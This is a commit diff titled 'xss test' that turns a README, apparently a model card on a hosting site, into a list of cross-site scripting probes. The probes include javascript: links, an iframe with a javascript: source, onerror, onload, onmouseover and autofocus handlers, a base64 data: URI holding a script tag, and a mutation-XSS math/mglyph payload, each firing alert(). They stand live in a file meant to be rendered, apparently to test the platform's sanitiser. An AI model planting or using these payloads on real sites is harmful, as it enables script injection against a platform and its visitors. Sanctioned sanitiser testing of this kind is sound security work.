xss test
Browse files
README.md
CHANGED
|
@@ -1,2 +1,26 @@
|
|
| 1 |
-
|
| 2 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
tags:
|
| 3 |
+
- test
|
| 4 |
+
license: mit
|
| 5 |
+
---
|
| 6 |
+
# Test Model
|
| 7 |
+
|
| 8 |
+
[Click me](javascript:alert(1))
|
| 9 |
+
|
| 10 |
+
)
|
| 11 |
+
|
| 12 |
+
<details><summary>Click</summary><img src=x onerror=alert(document.domain)></details>
|
| 13 |
+
|
| 14 |
+
<iframe src="javascript:alert(1)">
|
| 15 |
+
|
| 16 |
+
<a href="javascript:alert(1)">xss link</a>
|
| 17 |
+
|
| 18 |
+
[link](data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)
|
| 19 |
+
|
| 20 |
+
<div onmouseover="alert(1)">Hover me</div>
|
| 21 |
+
|
| 22 |
+
<svg onload="alert(1)">
|
| 23 |
+
|
| 24 |
+
<math><mtext><table><mglyph><style><!--</style><img src=x onerror=alert(1)>
|
| 25 |
+
|
| 26 |
+
<input onfocus=alert(1) autofocus>
|